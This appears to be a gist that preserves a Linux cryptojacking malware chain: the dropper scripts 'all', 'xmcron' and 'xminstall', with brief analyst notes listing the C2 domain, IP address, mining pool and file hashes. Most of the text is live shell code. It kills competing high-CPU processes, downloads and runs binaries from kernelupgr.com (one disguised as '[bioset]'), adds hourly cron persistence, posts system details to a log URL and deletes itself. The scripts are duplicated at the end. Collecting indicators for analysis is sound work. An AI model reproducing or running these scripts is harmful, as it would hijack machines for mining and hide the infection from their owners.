nl5887/all

## all
ps aux |awk '$3>40.0{print $2}'|xargs kill -9
cd /tmp
if [ $? -ne 0 ]
then
export PATH=`pwd`:$PATH
else
export PATH=/tmp:$PATH
fi
wget -q v.kernelupgr.com/d/vv -O \[bioset\] || curl -s v.kernelupgr.com/d/vv -o \[bioset\]
chmod +x \[bioset\]
(\[bioset\] &)
sleep 2
rm -f \[bioset\]
wget -q v.kernelupgr.com/d/sshd -O sshd || curl -s v.kernelupgr.com/d/sshd -o sshd
chmod +x sshd
(sshd &)
sleep 2
rm -f sshd
wget -t 3 -q v.kernelupgr.com/d/xminstall -O .xminstall || curl -s v.kernelupgr.com/d/xminstall -o .>
(sh .xminstall &)
cd -
rm -f $0

## notes.md

      
    Raw
  

              notes.md
            
          
    results are posted to:
v.kernelupgr.com/log.php
ip address:
5C73CA90 -> 144.202.115.92
Both vv and sshd are upx packed Go binaries.
two cryptomining
m.kernelupgr.com -> 144.202.115.92 is the mining pool
site shows:
Mining Proxy Onlin
cryptominer
sha256: eb3f65da10056208305836a12652dbcf878521bf1a18cbb997bbe444b3b4ad81
apache
sha256: eb3f65da10056208305836a12652dbcf878521bf1a18cbb997bbe444b3b4ad81
vv
sha256: 0dda4ed08e936912f0a35ce350d2753154a14556b0ae82b12dd51ccdf2199c92

  
## xmcron
#!/bin/sh
PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
wget -q  v.kernelupgr.com/d/xminstall -O /tmp/.update || curl -s v.kernelupgr.com/d/xminstall -o /tmp/.update ; sh /tmp/.update

## xminstall
cronpath="/etc/cron.hourly/placekeeper"
cronmd5=`md5sum $cronpath |awk '{print $1}'`
if [ "$cronmd5" != "9776303087238289e7f30393c0c113fe" ]
then
touch $cronpath
if [ $? -eq 0 ]
then
wget -q v.kernelupgr.com/d/xmcron -O $cronpath || curl -s v.kernelupgr.com/d/xmcron -o $cronpath
chmod +x $cronpath
else
(crontab -l |grep -v "kernelupgr"; echo "1 */1 * * * wget -q v.kernelupgr.com/d/xminstall -O /tmp/.update || curl -s v.kernelupgr.com/d/xminstall -o /tmp/.update; sh /tmp/.update") |crontab -
fi
fi
n=`grep 5C73CA90 /proc/net/tcp|wc -l`
if [ $n -ne 0 ]
then
pid=`(command -v netstat >/dev/null && netstat -antp|grep 144.202.115.92|head -n 1 |awk '{print $7}'|awk -F '/' '{print $1}') || (command -v ss > /dev/nll && ss -ntp |grep 144.202.115.92|head -n 1|awk '{print $6}' | awk -F ',' '{print $2}'|tr -cd '[0-9]')`
ps aux|grep -v $pid|awk '$3>40.0{print $2}'|xargs kill -9
rm -f $0
exit
fi
ps aux |awk '$3>40.0{print $2}'|xargs kill -9
cd /tmp
if [ $? -ne 0 ]
then
export PATH=`pwd`:$PATH
else
export PATH=/tmp:$PATH
fi
wget -t 3 -q v.kernelupgr.com/d/xm1.tgz -O apache.tgz || curl -s v.kernelupgr.com/d/xm1.tgz -o apache.tgz
tar xfz apache.tgz
chmod +x apache
apache
if [ $? -ne 0 ]
then
wget -t 3 -q v.kernelupgr.com/d/xm2.tgz -O apache.tgz || curl -s v.kernelupgr.com/d/xm2.tgz -o apache.tgz
tar xfz apache.tgz
chmod +x apache
apache
if [ $? -ne 0 ]
then
uname -a > tmp
apache &>> tmp
wget -t 3 -q --post-data="$(cat tmp)" v.kernelupgr.com/log.php -O /dev/null
rm -f tmp
fi
fi
rm -f apache.tgz apache config.json
cd -
rm -f $0
	ps aux \|awk '$3>40.0{print $2}'\|xargs kill -9
	cd /tmp
	if [ $? -ne 0 ]
	then
	export PATH=`pwd`:$PATH
	else
	export PATH=/tmp:$PATH
	fi
	wget -q v.kernelupgr.com/d/vv -O \[bioset\] \|\| curl -s v.kernelupgr.com/d/vv -o \[bioset\]
	chmod +x \[bioset\]
	(\[bioset\] &)
	sleep 2
	rm -f \[bioset\]
	wget -q v.kernelupgr.com/d/sshd -O sshd \|\| curl -s v.kernelupgr.com/d/sshd -o sshd
	chmod +x sshd
	(sshd &)
	sleep 2
	rm -f sshd
	wget -t 3 -q v.kernelupgr.com/d/xminstall -O .xminstall \|\| curl -s v.kernelupgr.com/d/xminstall -o .>
	(sh .xminstall &)
	cd -
	rm -f $0
	#!/bin/sh
	PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
	wget -q v.kernelupgr.com/d/xminstall -O /tmp/.update \|\| curl -s v.kernelupgr.com/d/xminstall -o /tmp/.update ; sh /tmp/.update
	cronpath="/etc/cron.hourly/placekeeper"
	cronmd5=`md5sum $cronpath \|awk '{print $1}'`
	if [ "$cronmd5" != "9776303087238289e7f30393c0c113fe" ]
	then
	touch $cronpath
	if [ $? -eq 0 ]
	then
	wget -q v.kernelupgr.com/d/xmcron -O $cronpath \|\| curl -s v.kernelupgr.com/d/xmcron -o $cronpath
	chmod +x $cronpath
	else
	(crontab -l \|grep -v "kernelupgr"; echo "1 /1 * * wget -q v.kernelupgr.com/d/xminstall -O /tmp/.update \|\| curl -s v.kernelupgr.com/d/xminstall -o /tmp/.update; sh /tmp/.update") \|crontab -
	fi
	fi
	n=`grep 5C73CA90 /proc/net/tcp\|wc -l`
	if [ $n -ne 0 ]
	then
	pid=`(command -v netstat >/dev/null && netstat -antp\|grep 144.202.115.92\|head -n 1 \|awk '{print $7}'\|awk -F '/' '{print $1}') \|\| (command -v ss > /dev/nll && ss -ntp \|grep 144.202.115.92\|head -n 1\|awk '{print $6}' \| awk -F ',' '{print $2}'\|tr -cd '[0-9]')`
	ps aux\|grep -v $pid\|awk '$3>40.0{print $2}'\|xargs kill -9
	rm -f $0
	exit
	fi
	ps aux \|awk '$3>40.0{print $2}'\|xargs kill -9
	cd /tmp
	if [ $? -ne 0 ]
	then
	export PATH=`pwd`:$PATH
	else
	export PATH=/tmp:$PATH
	fi
	wget -t 3 -q v.kernelupgr.com/d/xm1.tgz -O apache.tgz \|\| curl -s v.kernelupgr.com/d/xm1.tgz -o apache.tgz
	tar xfz apache.tgz
	chmod +x apache
	apache
	if [ $? -ne 0 ]
	then
	wget -t 3 -q v.kernelupgr.com/d/xm2.tgz -O apache.tgz \|\| curl -s v.kernelupgr.com/d/xm2.tgz -o apache.tgz
	tar xfz apache.tgz
	chmod +x apache
	apache
	if [ $? -ne 0 ]
	then
	uname -a > tmp
	apache &>> tmp
	wget -t 3 -q --post-data="$(cat tmp)" v.kernelupgr.com/log.php -O /dev/null
	rm -f tmp
	fi
	fi
	rm -f apache.tgz apache config.json
	cd -
	rm -f $0